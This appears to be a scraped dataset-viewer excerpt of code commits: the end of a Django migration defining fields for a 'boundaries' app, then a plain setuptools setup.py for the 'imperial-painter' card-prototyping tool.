            'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
            'notes': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'singular': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
            'slug': ('django.db.models.fields.SlugField', [], {'max_length': '200', 'primary_key': 'True'}),
            'source_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'}),
            'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'})
        }
    }
complete_apps = ['boundaries'] | Python | 0 | |
4f155252bf9d9508b955d7eecf589da347bff817 | Add a setup.cfg. | setup.py | setup.py | import setuptools
# Read the README for use as the package's long description on PyPI.
# Fixed: specify the encoding explicitly instead of relying on the platform
# default, which breaks on non-UTF-8 locales (e.g. Windows cp1252).
with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()
setuptools.setup(
name="imperial-painter-adam-thomas",
version="1.0.0",
author="Adam Thomas",
author_email="sortoflikechess@gmail.com",
description="A tool for generating prototype cards from Excel files and Django templates",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/adam-thomas/imperial-painter",
packages=setuptools.find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
) | Python | 0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.